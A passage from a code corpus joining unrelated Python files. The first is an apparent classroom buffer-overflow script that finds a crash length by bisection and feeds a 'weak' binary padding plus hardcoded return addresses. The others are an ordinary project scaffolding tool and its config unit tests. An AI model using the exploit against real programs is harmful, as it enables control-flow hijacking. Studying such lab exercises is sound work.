# -------------------------------- FUNCTIONS ----------------------------------
def buffer_exploit(program: str, output: str):
"""
Find the minimum number of letters that can cause a buffer overflow and
write the appropriate attack byte content into a file named 'output'.
"""
if not all(isinstance(arg, str) for arg in (program, output)):
raise TypeError("'program' and 'output' must be of 'str' type")
if not shutil.which(program):
raise ValueError("The given 'program' is not found")
buffer_size = None
buffer_found = False
high = 1
padding_byte = b"0"
secret_byte = b"\x24\x82\x04\x08"
exit_byte = b"\xfc\x0d\x05\x08"
low = None
high_found = False
output_info = "The minimum number of letters that caused overflow is: {0}"
while not high_found:
with subprocess.Popen([program], stdin=subprocess.PIPE) as proc:
proc.communicate(padding_byte * high)
# iteratively double 'high' as long as no 'SIGSEGV' signal
# is delivered
if proc.returncode == -signal.SIGSEGV:
high_found = True
else:
high *= 2
low = high // 2
buffer_size = (low + high) // 2
while not buffer_found:
with subprocess.Popen([program], stdin=subprocess.PIPE) as proc1:
proc1.communicate(padding_byte * buffer_size)
# if the program crashes with SIGSEGV signal
if proc1.returncode == -signal.SIGSEGV:
# need to test whether buffer_size - 1 still cause a crash
with subprocess.Popen([program], stdin=subprocess.PIPE) as proc2:
proc2.communicate(padding_byte * (buffer_size - 1))
# if it still crashes, set 'high' to be 'buffer_size'
if proc2.returncode == -signal.SIGSEGV:
high = buffer_size - 1
# otherwise we have found the minimum 'buffer_size' that
# cause a crash
else:
buffer_found = True
else:
low = buffer_size + 1
buffer_size = (low + high) // 2
print(output_info.format(buffer_size))
with open(output, "wb") as dump:
dump.write(padding_byte * buffer_size + secret_byte + exit_byte)
with subprocess.Popen([program], stdin=subprocess.PIPE) as proc:
proc.communicate(padding_byte * buffer_size + secret_byte + exit_byte)
def main():
"""
Main command line driver.
"""
parser = argparse.ArgumentParser()
attr_desc_dict = {
"executable": "path to the 'weak' executable",
"output": "file to store the binary content used for attacking"
}
for flag, msg in attr_desc_dict.items():
parser.add_argument("-" + flag[0],
"--" + flag,
type=str,
required=False,
help=msg)
args = parser.parse_args()
arg_list = None
if all(getattr(args, attr) for attr in attr_desc_dict):
arg_list = [getattr(args, attr) for attr in sorted(attr_desc_dict)]
buffer_exploit(*arg_list)
# -------------------------------- FUNCTIONS ----------------------------------
if __name__ == "__main__":
main()
``` |
{
"source": "jhxie/genmake",
"score": 2
} |
#### File: genmake/skaff/driver.py
```python
__all__ = ["skaff_drive"]
# ------------------------------- MODULE INFO ---------------------------------
# --------------------------------- MODULES -----------------------------------
import collections
import os
import re
import shutil
import subprocess
import tempfile
from datetime import datetime
from distutils import spawn
from skaff.clitools import (
timed_key_get,
ANSIColor
)
from skaff.config import SkaffConfig
# --------------------------------- MODULES -----------------------------------
# -------------------------------- FUNCTIONS ----------------------------------
def skaff_drive(config: SkaffConfig) -> None:
"""
Creates all the necessary subdirectories in addition to the project root.
"""
if not isinstance(config, SkaffConfig):
raise ValueError("'config' argument must be of 'SkaffConfig' type")
for base_dir in config.directories_get():
os.makedirs(base_dir)
for sub_dir in config.subdirectories_get():
os.makedirs(base_dir + sub_dir)
# Create parent directory if it does not exist
os.makedirs("{0}include{1}{2}".format(base_dir,
os.sep,
os.path.basename(base_dir[:-1])))
_license_sign(base_dir, config)
_conf_doc_prompt(base_dir, config)
def _arguments_check(directory, config):
"""
Performs 3 separate checks for the input 'directory' and 'config':
1. Whether 'directory' actually exist in the physical file system.
2. Whether 'config' is a (sub)class instance of 'SkaffConfig'.
3. Whether 'directory' can be obtained by 'directories_get' member function
call.
"""
if not os.path.isdir(directory):
raise ValueError("'directory' must already exist")
if not isinstance(config, SkaffConfig):
raise ValueError("'config' argument must be of 'SkaffConfig' type")
if directory not in config.directories_get():
raise ValueError(("'directory' argument must appear in the result of "
"'directories_get()' member function invocation"))
def _conf_doc_prompt(directory, config):
"""
Prints interactive prompt related to the current 'directory' if 'quiet' is
False.
Calls '_conf_spawn' and '_doc_create()' with the arguments given
afterwards.
"""
_arguments_check(directory, config)
terminal_info = shutil.get_terminal_size()
hints = list()
hints.append("Upcoming Configuration Editing for {0}{1}{2}".format(
ANSIColor.KHAKI, directory, ANSIColor.RESET))
hints.append("The editing will start after [{0}{1}{2}].".format(
ANSIColor.BLUE, "5 seconds", ANSIColor.RESET))
hints.append("Press [{0}c{1}] to continue the editing.".format(
ANSIColor.PURPLE, ANSIColor.RESET))
hints.append("Press [{0}k{1}] to skip the upcoming directory.".format(
ANSIColor.PURPLE, ANSIColor.RESET))
hints.append("Press [{0}a{1}] to skip all the rest.".format(
ANSIColor.PURPLE, ANSIColor.RESET))
key = str()
quiet = config.quiet_get()
if not quiet:
if "posix" == os.name:
os.system("clear")
elif "nt" == os.name:
os.system("cls")
print("-" * terminal_info.columns + "\n")
for line in hints:
print(line.center(terminal_info.columns))
print("\n" + "-" * terminal_info.columns)
try:
while "c" != key.lower():
key = timed_key_get(5)
if "a" == key.lower() or "k" == key.lower():
config.quiet_set(True)
break
except TimeoutError:
pass
if "posix" == os.name:
os.system("clear")
elif "nt" == os.name:
os.system("cls")
_conf_spawn(directory, config)
_doc_create(directory, config)
# Revert the changes if only the current 'directory' is affected
# by the 'quiet' setting
if "k" == key.lower():
config.quiet_set(False)
def _conf_edit(directory, conf_files):
"""
Edits all the 'conf_files' under 'directory' interactively.
By default the environment variable 'EDITOR' is used; if it is empty,
fall back to either 'vim' or 'vi'.
"""
if not directory or not os.path.isdir(directory):
raise ValueError("'directory' must already exist")
if not directory.endswith(os.sep):
directory += os.sep
if not isinstance(conf_files, collections.Iterable):
raise ValueError("'conf_files' argument must be of iterable type")
elif 0 == len(conf_files):
raise ValueError("'conf_files' argument must not be empty")
# Default to 'vi' or 'vim' if the environment variable is not set.
default_editor = None
editor_candidates = ("vim", "vi", "notepad")
for candidate in editor_candidates:
if spawn.find_executable(candidate):
default_editor = candidate
break
else:
raise RuntimeError("editors not found")
editor = os.environ.get("EDITOR", default_editor)
for conf_file in conf_files:
subprocess.call([editor, directory + conf_file])
def _conf_spawn(directory, config):
"""
Spawns configuration files under the project root directory.
The spawned configuration files in the project root include:
{
".editorconfig", ".gdbinit", ".gitattributes",
".gitignore", ".travis.yml", "CMakeLists.txt"
}
An additional "CMakeLists.txt" will also be spawned in 'src' subdirectory
if it exists.
"""
_arguments_check(directory, config)
language = config.language_get()
quiet = config.quiet_get()
cmake_file = "CMakeLists.txt"
cmake_source_prefix = SkaffConfig.basepath_fetch() +\
"config" + os.sep +\
"template" + os.sep +\
language + os.sep
sample_source_file = "main." + language
shutil.copy(cmake_source_prefix + cmake_file, directory)
if os.path.isdir(directory + "src"):
shutil.copy(cmake_source_prefix + "src" + os.sep + cmake_file,
directory + "src" + os.sep)
shutil.copy(cmake_source_prefix + "src" + os.sep + sample_source_file,
directory + "src" + os.sep)
# Again, "figuring out where the configuration resides" may belong to the
# responsibility of 'SkaffConfig' class; this responsibiltiy will be
# moved to 'SkaffConfig' after "ini-parsing" functionality is implemented.
conf_files = ("editorconfig", "gdbinit", "gitattributes", "gitignore")
conf_source_prefix = SkaffConfig.basepath_fetch() +\
"config" + os.sep +\
"template" + os.sep
conf_target_prefix = directory + "."
travis_file = "travis.yml"
travis_source_file = conf_source_prefix + travis_file
travis_target_file = conf_target_prefix + travis_file
language_header = "language: {0}\n".format(language)
for configuration in conf_files:
shutil.copy(conf_source_prefix + configuration + ".txt",
conf_target_prefix + configuration)
with open(travis_source_file, "r", encoding="utf-8") as travis_source:
travis_text = travis_source.read()
with open(travis_target_file, "w", encoding="utf-8") as travis_target:
travis_target.write(language_header)
travis_target.write(travis_text)
if not quiet:
_conf_edit(directory, [cmake_file])
def _doc_create(directory, config):
"""
Creates 'CHANGELOG.md', 'Doxyfile', and 'README.md' template.
Launches $EDITOR or vim on the 'Doxyfile' upon completion, can be turned
off by setting quiet to True.
"""
_arguments_check(directory, config)
changelog_header = (
"# Change Log\n"
"This document records all notable changes to {0}. \n"
"This project adheres to [Semantic Versioning](http://semver.org/).\n"
"\n## 0.1 (Upcoming)\n"
"* New feature here\n"
).format(directory[:-1].title())
readme_header = (
"\n"
"\n## Overview\n"
"\n## License\n"
).format(directory[:-1], os.sep)
changelog_text = directory + "CHANGELOG.md"
copyright_line = "Copyright © {year} {authors}\n".format(
year=datetime.now().year,
authors=", ".join(config.authors_get())
)
license_text = SkaffConfig.basepath_fetch() +\
"config" + os.sep +\
"license" + os.sep +\
config.license_get() + ".md"
readme_text = directory + "README.md"
with open(license_text, "r", encoding="utf-8") as license_file:
license_markdown = license_file.read()
with open(readme_text, "w", encoding="utf-8") as readme_file:
readme_file.write(readme_header)
readme_file.write(copyright_line)
readme_file.write(license_markdown)
with open(changelog_text, "w", encoding="utf-8") as changelog_file:
changelog_file.write(changelog_header)
_doxyfile_generate(directory, config)
def _doxyfile_attr_match(project_name, line):
"""
Determines whether there is any 'Doxyfile' options available in 'line'.
Return the updated version if 'line' contains options that need to be
changed; otherwise return None.
"""
arguments = (project_name, line)
if not all(argument for argument in arguments):
raise ValueError(("Both 'project_name' and 'line' "
"have to be non-empty 'str' type"))
if not all(isinstance(argument, str) for argument in arguments):
raise ValueError(("Both 'project_name' and 'line' "
"have to be of 'str' type"))
# Gets rid of the trailing separator character
if project_name.endswith(os.sep):
project_name = project_name[:-1]
# Tests whether the length of 'project_name' become 0 after truncation
if not project_name:
raise ValueError("'project_name' cannot be a single slash character")
attr_dict = {"PROJECT_NAME": "\"" + project_name.title() + "\"",
"OUTPUT_DIRECTORY": "." + os.sep + "doc",
"TAB_SIZE": 8,
"EXTRACT_ALL": "YES",
"EXTRACT_STATIC": "YES",
"RECURSIVE": "YES",
"EXCLUDE": "build",
"HAVE_DOT": "YES",
"UML_LOOK": "YES",
"TEMPLATE_RELATIONS": "YES",
"CALL_GRAPH": "YES",
"DOT_IMAGE_FORMAT": "svg",
"INTERACTIVE_SVG": "YES"}
line = line.lstrip()
# If the line is solely composed of whitespace or is a comment
if not line or line.startswith("#"):
return None
for attr in attr_dict:
# '\s' stands for whitespace characters
match = re.match(R"\s*" + attr + R"\s*=", line)
if match:
split_index = match.string.find("=") + 1
return match.string[:split_index] + " " +\
str(attr_dict[attr]) + "\n"
return None
def _doxyfile_generate(directory, config):
"""
Generates or uses existing template 'Doxyfile' within 'directory'.
Launches $EDITOR or vim afterwards if 'quiet' is set to False.
"""
_arguments_check(directory, config)
doxyfile = "Doxyfile"
doxyfile_source_prefix = SkaffConfig.basepath_fetch() +\
"config" + os.sep +\
"template" + os.sep
doxyfile_target_prefix = directory
doxygen_cmd = ["doxygen", "-g", doxyfile_target_prefix + doxyfile]
quiet = config.quiet_get()
if spawn.find_executable("doxygen"):
# Redirects the terminal output of 'doxygen' to null device
with open(os.devnull, "w") as null_device:
subprocess.call(doxygen_cmd, stdout=null_device)
with tempfile.TemporaryFile("w+") as tmp_file:
with open(doxyfile_target_prefix + doxyfile, "r+") as output_file:
for line in output_file:
match = _doxyfile_attr_match(directory, line)
tmp_file.write(line if not match else match)
tmp_file.seek(0)
output_file.seek(0)
output_file.truncate()
shutil.copyfileobj(tmp_file, output_file)
else:
shutil.copy(doxyfile_source_prefix + doxyfile,
doxyfile_target_prefix + doxyfile)
if not quiet:
_conf_edit(directory, [doxyfile])
def _license_sign(directory, config):
"""
Copies the license chosen by authors to the 'directory', signs it
with authors and current year prepended if applicable; 'directory' must
already exist.
Note only licenses in {"bsd2", "bsd3", "mit"} will be signed by names in
authors.
"""
_arguments_check(directory, config)
copyright_line = "Copyright (c) {year}, {authors}\n".format(
year=datetime.now().year,
authors=", ".join(config.authors_get())
)
# Note "figuring out where the source license resides" may belong to the
# responsibility of 'SkaffConfig' class; this responsibiltiy will be
# moved to 'SkaffConfig' after "ini-parsing" functionality is implemented.
license_source = SkaffConfig.basepath_fetch() +\
"config" + os.sep +\
"license" + os.sep +\
config.license_get() + ".txt"
license_target = directory + "LICENSE.txt"
if config.license_get() in frozenset(("bsd2", "bsd3", "mit")):
with open(license_source, "r", encoding="utf-8") as from_file:
vanilla_license_text = from_file.read()
with open(license_target, "w", encoding="utf-8") as to_file:
to_file.write(copyright_line)
to_file.write(vanilla_license_text)
else:
shutil.copy(license_source, license_target)
# -------------------------------- FUNCTIONS ----------------------------------
```
#### File: genmake/skaff/info.py
```python
__all__ = ["skaff_description_get", "skaff_info_get"]
# ------------------------------- MODULE INFO ---------------------------------
# --------------------------------- MODULES -----------------------------------
from datetime import datetime
from skaff import (
__author__,
__email__,
__license__,
__maintainer__,
__version__
)
# --------------------------------- MODULES -----------------------------------
# -------------------------------- FUNCTIONS ----------------------------------
def skaff_description_get(short: bool=True) -> str:
"""
Returns the description string of the skaff program.
A concise description will be returned if 'short' is set to True; otherwise
the full version is returned instead.
"""
short_description = "An Extensible Project Scaffolding Tool"
long_description = ("Skaff is a Python library for building programming "
"language dependent scaffolding of software projects, "
"and a command-line tool that uses this library with "
"built-in (CMake-based) C/C++ support.")
if short:
return short_description
else:
return long_description
def skaff_info_get() -> str:
"""
Returns the copyright information string of the skaff program.
"""
module_info_dict = {"author": __author__,
"email": __email__,
"info": skaff_description_get(short=True),
"license": __license__,
"maintainer": __maintainer__,
"version": __version__,
"year": datetime.now().year}
skaff_info = (
"skaff "
"({info}) {version}\n"
"Copyright (C) {year} {author}.\n"
"Licensed and distributed under the BSD 2-Clause License.\n"
"This is free software: you are free to change and redistribute it.\n"
"There is NO WARRANTY, to the extent permitted by law.\n\n"
"Written by {author}.".format(**module_info_dict))
return skaff_info
# -------------------------------- FUNCTIONS ----------------------------------
```
#### File: genmake/tests/config_test.py
```python
import collections
import os
if "posix" == os.name:
import pwd
elif "nt" == os.name:
import getpass
import unittest
from skaff.config import SkaffConfig
from tempfile import TemporaryDirectory
# --------------------------------- MODULES -----------------------------------
# --------------------------------- CLASSES -----------------------------------
class TestConfig(unittest.TestCase):
"""
Unit testing suite for 'config' module.
"""
def setUp(self):
self.tmp_dir = TemporaryDirectory()
if not self.tmp_dir.name.endswith(os.sep):
self.tmp_dir.name += os.sep
# NOTE: the 'directories' argument needs to be an iterable;
# a tuple (denoted by an extra comma inside the parentheses) is used.
self.config = SkaffConfig((self.tmp_dir.name,))
def tearDown(self):
# No need to invoke 'directory_discard' since for each test member
# function a new 'SkaffConfig' instance is created.
self.tmp_dir.cleanup()
def test_authors_set(self):
# The branch where 'authors' is 'None' is tested in 'test_author_fetch'
# member function, so it is skipped here
authors = ["<NAME>", "<NAME>", lambda x: not x]
# Fail due to non-iterable type
with self.assertRaises(TypeError):
self.config.authors_set(authors[-1])
# Fail due to non-containerized string type
with self.assertRaises(TypeError):
self.config.authors_set(authors[0])
# Fail due to empty string
with self.assertRaises(ValueError):
self.config.authors_set((str(),))
# Fail due to the existence of non-string type
with self.assertRaises(TypeError):
self.config.authors_set(authors)
authors[-1] = "\t"
# Fail due to the existence of non-printable string
with self.assertRaises(ValueError):
self.config.authors_set(authors)
del authors[-1]
self.config.authors_set(authors)
self.assertCountEqual(authors, self.config.authors_get())
def test_author_add(self):
# This "magic number" is questionable;
# but to maintain "test reproducibility" it is kept this way
add_count = 10
author_added = "<NAME>"
counter = None
# Fail due to wrong type for the 'author' argument
with self.assertRaises(TypeError):
self.config.author_add(None)
# Fail because the 'author' argument cannot be an empty string
with self.assertRaises(ValueError):
self.config.author_add(str())
# Fail because the 'author' argument cannot contain non-printables
with self.assertRaises(ValueError):
self.config.author_add("\t")
for _ in range(add_count):
self.config.author_add(author_added)
# Success if 'author_add' actually added the specified 'author'
self.assertIn(author_added, self.config.authors_get())
counter = collections.Counter(self.config.authors_get())
# Success if the underlying representation
# for authors does not permit duplicates
self.assertEqual(1, counter[author_added])
def test_author_discard(self):
# Again, this "magic number" is questionable;
# but to maintain "test reproducibility" it is kept this way
add_count = 10
author_discarded = "<NAME>"
# Fail due to wrong type for the 'author' argument
with self.assertRaises(TypeError):
self.config.author_discard(None)
# Fail because the 'author' argument cannot be an empty string
with self.assertRaises(ValueError):
self.config.author_discard(str())
# Fail because the 'author' argument cannot contain non-printables
with self.assertRaises(ValueError):
self.config.author_discard("\t")
for _ in range(add_count):
self.config.author_add(author_discarded)
self.config.author_discard(author_discarded)
# Success if the underlying representation
# for authors does not permit duplicates
self.assertNotIn(author_discarded, self.config.authors_get())
def test_authors_get(self):
authors = ("Pratt", "Whitney")
get_result = None
self.config.authors_set(authors)
get_result = self.config.authors_get()
self.assertCountEqual(authors, get_result)
def test_author_fetch(self):
if "posix" == os.name:
# Get system password database record based on current user UID
pw_record = pwd.getpwuid(os.getuid())
# '_author_get()' must return identical term
# if GECOS field is defined
if pw_record.pw_gecos:
author = pw_record.pw_gecos
if author.endswith(","):
author = author.strip(",")
self.assertEqual(SkaffConfig.author_fetch(), author)
# Otherwise it must matches the current user's login name
elif pw_record.pw_name:
self.assertEqual(SkaffConfig.author_fetch(), pw_record.pw_name)
# If none of the above works, 'RuntimeError' is raised
else:
with self.assertRaises(RuntimeError):
SkaffConfig.author_fetch()
elif "nt" == os.name:
author = getpass.getuser()
if author:
self.assertEqual(SkaffConfig.author_fetch(), author)
else:
with self.assertRaises(RuntimeError):
SkaffConfig.author_fetch()
def test_basepath_fetch(self):
basepath = SkaffConfig.basepath_fetch()
self.assertTrue(os.path.isdir(basepath))
self.assertTrue(os.path.isabs(basepath))
def test_directories_set(self):
# Identical to 'test_authors_set' because the similarity between
# the 2 mutator member functions; may be expanded later on if new
# checking branches are added to 'directories_set'
directories = ["Apollo" + os.sep, "Spirit" + os.sep, lambda x: not x]
# Fail due to non-iterable type
with self.assertRaises(TypeError):
self.config.directories_set(directories[-1])
# Fail due to non-containerized string type
with self.assertRaises(TypeError):
self.config.directories_set(directories[0])
# Fail due to empty string
with self.assertRaises(ValueError):
self.config.directories_set((str(),))
# Fail due to the existence of non-string type
with self.assertRaises(TypeError):
self.config.directories_set(directories)
directories[-1] = "\t"
# Fail due to the existence of non-printable string
with self.assertRaises(ValueError):
self.config.directories_set(directories)
# Success
del directories[-1]
self.config.directories_set(directories)
self.assertCountEqual(directories, self.config.directories_get())
def test_directory_add(self):
# Again, identical to 'test_author_add'.
# This "magic number" is questionable;
# but to maintain "test reproducibility" it is kept this way
add_count = 10
directory_added = "Android"
counter = None
# Fail due to wrong type for the 'directory' argument
with self.assertRaises(TypeError):
self.config.directory_add(None)
# Fail because the 'directory' argument cannot be an empty string
with self.assertRaises(ValueError):
self.config.directory_add(str())
# Fail because the 'directory' argument cannot contain non-printables
with self.assertRaises(ValueError):
self.config.directory_add("\t")
for _ in range(add_count):
self.config.directory_add(directory_added)
# Success if 'directory_add' actually added the specified 'directory'
self.assertIn(directory_added + os.sep, self.config.directories_get())
counter = collections.Counter(self.config.directories_get())
# Success if the underlying representation
# for authors does not permit duplicates
self.assertEqual(1, counter[directory_added + os.sep])
def test_directory_discard(self):
# Again, identical to 'test_author_discard'.
# This "magic number" is questionable;
# but to maintain "test reproducibility" it is kept this way
add_count = 10
directory_discarded = "Symbian"
# Fail due to wrong type for the 'author' argument
with self.assertRaises(TypeError):
self.config.directory_discard(None)
# Fail because the 'author' argument cannot be an empty string
with self.assertRaises(ValueError):
self.config.directory_discard(str())
# Fail because the 'author' argument cannot contain non-printables
with self.assertRaises(ValueError):
self.config.directory_discard("\t")
# The path separator will be automatically added in both
# 'directory_add' and 'directory_discard' member functions
for _ in range(add_count):
self.config.directory_add(directory_discarded)
self.config.directory_discard(directory_discarded)
# Success if the underlying representation
# for authors does not permit duplicates
self.assertNotIn(directory_discarded, self.config.directories_get())
self.assertNotIn(directory_discarded + os.sep,
self.config.directories_get())
def test_directories_get(self):
# Test directory names with non-ascii characters
directories = ["Αντικύθηρα" + os.sep, "Ουροβόρος όφις" + os.sep]
get_result = None
self.config.directories_set(directories)
get_result = self.config.directories_get()
self.assertCountEqual(directories, get_result)
def test_language_set(self):
language = "Svenska"
languages = self.config.languages_list()
# Whatever the default programming language is, it must conform to its
# own invarients: the language set automatically must belong to the
# listing of supported languages generated by the class itself.
self.config.language_set(None)
self.assertIn(self.config.language_get(), languages)
self.assertNotIn(language, languages)
with self.assertRaises(ValueError):
self.config.language_set(language)
def test_language_get(self):
# Every language specified in the listing should work.
for language in self.config.languages_list():
self.config.language_set(language)
self.assertEqual(language, self.config.language_get())
def test_languages_probe(self):
pass
def test_license_set(self):
# Identical to 'test_language_set' due to the similarity between
# 'language_set' and 'license_set' mutator functions.
license = "EULA"
licenses = self.config.licenses_list()
self.config.license_set(None)
self.assertIn(self.config.license_get(), licenses)
self.assertNotIn(license, licenses)
with self.assertRaises(ValueError):
self.config.license_set(license)
def test_license_get(self):
# Here 'bsd2' license is chosen to be overridden even though
# those licenses rarely (if at all) need to be "re-defined".
bsd2_text = ("Legal Text to be Written by Lawyers"
"with Some Extra Strings Attached")
bsd2_markdown = (
"Licensed under the BSD 2 Clause License. \n"
"Distributed under the BSD 2 Clause License. \n\n")
bsd2_text_name = self.tmp_dir.name + "bsd2.txt"
bsd2_md_name = self.tmp_dir.name + "bsd2.md"
normalize_funcs = (os.path.basename, os.path.splitext, lambda x: x[0])
system_licenses = None
user_licenses = None
# Every license specified in the listing should work.
for license in self.config.licenses_list():
self.config.license_set(license)
self.assertEqual(license, self.config.license_get())
# The following tests abide by the similar test pattern used in
# 'test_license_list'; but slightly simpler.
# Revert to the default license
self.config.license_set()
system_licenses = self.config.license_get(fullname=True)
with open(bsd2_text_name, "w", encoding="utf-8") as license_text:
license_text.write(bsd2_text)
with open(bsd2_md_name, "w", encoding="utf-8") as license_markdown:
license_markdown.write(bsd2_markdown)
# Add the overridden 'bsd2' license to the internal database
self.config.paths_set(license=self.tmp_dir.name)
self.config.licenses_probe()
user_licenses = self.config.license_get(fullname=True)
# Success if two versions of qualified licenses differ;
# should be the case if 'bsd2' license is successfully overridden
self.assertNotEqual(system_licenses, user_licenses)
# Success if the fully qualified version of the licenses are equivalent
# to each other after removing paths and file extensions
for licenses in (system_licenses, user_licenses):
for index in range(len(licenses)):
for func in normalize_funcs:
licenses[index] = func(licenses[index])
self.assertEqual(system_licenses, user_licenses)
os.remove(bsd2_text_name)
os.remove(bsd2_md_name)
def test_license_sign(self):
chosen_license = "bsd2"
spawned_files = ("LICENSE.txt", "README.md")
self.config.license_set(chosen_license)
# The 'directories' tracked by the 'config' is already created by
# the 'setUp' test fixture method, so a file-existence test can be
# performed directly for 'license_sign'.
self.config.license_sign()
for spawned_file in spawned_files:
self.assertTrue(os.path.isfile(self.tmp_dir.name + spawned_file))
os.remove(self.tmp_dir.name + spawned_file)
def test_licenses_list(self):
licenses = set(self.config.licenses_list(fullname=False))
qualified_licenses = set(self.config.licenses_list(fullname=True))
result_licenses = set()
bsd2_text = ("Random Empty Replacement Text")
bsd2_markdown = (
"Licensed under the BSD 2 Clause License. \n"
"Distributed under the BSD 2 Clause License. \n\n")
bsd2_text_name = self.tmp_dir.name + "bsd2.txt"
bsd2_markdown_name = self.tmp_dir.name + "bsd2.md"
system_config_path = (SkaffConfig.basepath_fetch() + "config" + os.sep)
system_license_path = system_config_path + "license" + os.sep
# Similar to what is done in 'test_licenses_probe',
# sets the 'user' 'license' path to the temporary directory
# so all the licenses created in this test case would be
# automatically removed upon completion (by the 'tearDown')
self.config.paths_set(license=self.tmp_dir.name)
# The number of qualified version of license
# (licenses with fully qualified path and extension) is equal to
# the number of file exntension supported per license * actual number
# of licenses supported
#
# For example, for the current version 1.0, the supported file formats
# for each license are ".txt" and ".md" (refer to the __LICNESE_FORMATS
# private class attribute for details), if the fully qualified version
# of filenames are needed, then for each file both ".txt" version of
# the license and ".md" version of the license will be returned.
#
# Therefore the length of the 'qualified_licenses' is equal to the
# number of file formats for each license (".txt", ".md") times the
# actual number of license ('licenses' variable here).
self.assertEqual(len(licenses) * 2, len(qualified_licenses))
# Success if the fully qualified version of the licenses are equivalent
# to the originals after removing path and extension.
for license in qualified_licenses:
for func in (os.path.basename, os.path.splitext, lambda x: x[0]):
license = func(license)
result_licenses.add(license)
self.assertEqual(licenses, result_licenses)
# Both text and markdown format of the overriden license need to
# present; otherwise 'licenses_probe' will fail
with open(bsd2_text_name, "w") as license_text:
license_text.write(bsd2_text)
with open(bsd2_markdown_name, "w") as license_markdown:
license_markdown.write(bsd2_markdown)
# Success if both overridden license formats are present in the
# fully-qualified result; the stock version of 'bsd2' licenses
# in the 'system' path should not appear in the listing.
self.config.licenses_probe()
overridden_licenses = set(self.config.licenses_list(fullname=True))
self.assertIn(bsd2_text_name, overridden_licenses)
self.assertIn(bsd2_markdown_name, overridden_licenses)
self.assertNotIn(system_license_path + "bsd2.txt", overridden_licenses)
self.assertNotIn(system_license_path + "bsd2.md", overridden_licenses)
os.remove(bsd2_text_name)
os.remove(bsd2_markdown_name)
def test_licenses_probe(self):
zlib_text = (
"This software is provided 'as-is', without any express\n"
"or implied warranty. In no event will the authors be held\n"
"liable for any damages arising from the use of this software.\n\n"
"Permission is granted to anyone to use this software for any\n"
"purpose, including commercial applications, and to alter it and\n"
"redistribute it freely, subject to the following "
"restrictions:\n\n"
"1. The origin of this software must not be misrepresented;\n"
"you must not claim that you wrote the original software.\n"
"If you use this software in a product, an acknowledgement\n"
"in the product documentation would be appreciated but is not "
"required.\n"
"2. Altered source versions must be plainly marked as such,\n"
"and must not be misrepresented as being the original software.\n"
"3. This notice may not be removed or altered from any source\n"
"distribution.\n")
zlib_markdown = (
"Licensed under the Zlib License. \n"
"Distributed under the Zlib License. \n\n")
zlib_text_name = self.tmp_dir.name + "zlib.txt"
zlib_markdown_name = self.tmp_dir.name + "zlib.md"
# Sets the 'user' 'license' path to the temporary directory
# so all the licenses created in this test case would be
# automatically removed upon completion (by the 'tearDown')
self.config.paths_set(license=self.tmp_dir.name)
# License-text only test: fail because the lack of corresponding
# markdown file
with open(zlib_text_name, "w") as license_text:
license_text.write(zlib_text)
with self.assertRaises(FileNotFoundError):
self.config.licenses_probe()
os.remove(zlib_text_name)
# License-markdown only test: fail because the lack of corresponding
# text file
with open(zlib_markdown_name, "w") as license_markdown:
license_markdown.write(zlib_markdown)
with self.assertRaises(FileNotFoundError):
self.config.licenses_probe()
os.remove(zlib_markdown_name)
# Success since there is no new custom license
self.config.licenses_probe()
# Success due to the existence of both text and markdown format
# of the given license
with open(zlib_text_name, "w") as license_text:
license_text.write(zlib_text)
with open(zlib_markdown_name, "w") as license_markdown:
license_markdown.write(zlib_markdown)
self.config.licenses_probe()
self.assertIn("zlib", self.config.licenses_list())
os.remove(zlib_text_name)
os.remove(zlib_markdown_name)
def test_licenses_validate(self):
# Cannot be tested since the 'system' license path is hardcoded
# and within this test suite assumption like
# "the full skaff program is installed properly in the system"
# cannot be made: the test suite may be launched prior to the
# installation of the "skaff" program, if at all.
pass
def test_paths_set(self):
keys = ("config", "license", "template")
random_key = "random"
paths = dict.fromkeys(keys)
# Fail due to 'None' values
with self.assertRaises(ValueError):
self.config.paths_set(**paths)
# Fail due to invalid key-value argument
with self.assertRaises(ValueError):
self.config.paths_set(random_key=random_key)
# Fail due to invalid value argument
paths["config"] = self.tmp_dir.name
paths["license"] = paths["config"] + "license" + os.sep
paths["template"] = 0
with self.assertRaises(ValueError):
self.config.paths_set(**paths)
paths["template"] = paths["config"] + "template" + os.sep
self.config.paths_set(**paths)
self.config.paths_set()
self.assertTrue(all(self.config.paths_get()))
def test_paths_get(self):
keys = ("config", "license", "template")
result_dict = None
result_list = None
# Fail due to 'None' type argument
with self.assertRaises(TypeError):
self.config.paths_get(None)
# Success if the dictionary returned is a deep copy;
# so the internal 'database' would not be accidentally altered
self.config.paths_set()
result_dict = self.config.paths_get()
for key in keys:
result_dict[key] = None
self.assertIsInstance(self.config.paths_get(key), str)
# Success if the list returned contains the corresponding paths
# of the keys given
self.config.paths_set()
result_list = self.config.paths_get(*keys)
for result in result_list:
self.assertIsInstance(result, str)
def test_quiet_set(self):
self.config.quiet_set(None)
self.assertIsInstance(self.config.quiet_get(), bool)
with self.assertRaises(TypeError):
self.config.quiet_set(str())
def test_quiet_get(self):
options = (True, False)
for option in options:
self.config.quiet_set(option)
self.assertEqual(option, self.config.quiet_get())
def test_subdirectories_set(self):
# Identical to 'test_directories_set' because the similarity between
# the 2 mutator member functions; may be expanded later on if new
# checking branches are added to 'subdirectories_set'
subdirectories = ["Opportunity" + os.sep,
"Curiosity" + os.sep,
lambda x: not x]
# Fail due to non-iterable type
with self.assertRaises(TypeError):
self.config.subdirectories_set(subdirectories[-1])
# Fail due to non-containerized string type
with self.assertRaises(TypeError):
self.config.subdirectories_set(subdirectories[0])
# Fail due to empty string
with self.assertRaises(ValueError):
self.config.subdirectories_set((str(),))
# Fail due to the existence of non-string type
with self.assertRaises(TypeError):
self.config.subdirectories_set(subdirectories)
subdirectories[-1] = "\t"
# Fail due to the existence of non-printable string
with self.assertRaises(ValueError):
self.config.subdirectories_set(subdirectories)
# Success
del subdirectories[-1]
self.config.subdirectories_set(subdirectories)
self.assertCountEqual(subdirectories, self.config.subdirectories_get())
def test_subdirectory_add(self):
# Again, identical to 'test_directory_add'.
# This "magic number" is questionable;
# but to maintain "test reproducibility" it is kept this way
add_count = 10
subdirectory_added = "Unix"
counter = None
# Fail due to wrong type for the 'directory' argument
with self.assertRaises(TypeError):
self.config.subdirectory_add(None)
# Fail because the 'directory' argument cannot be an empty string
with self.assertRaises(ValueError):
self.config.subdirectory_add(str())
# Fail because the 'directory' argument cannot contain non-printables
with self.assertRaises(ValueError):
self.config.subdirectory_add("\t")
for _ in range(add_count):
self.config.subdirectory_add(subdirectory_added)
# Success if 'directory_add' actually added the specified 'directory'
self.assertIn(subdirectory_added + os.sep,
self.config.subdirectories_get())
counter = collections.Counter(self.config.subdirectories_get())
# Success if the underlying representation
# for authors does not permit duplicates
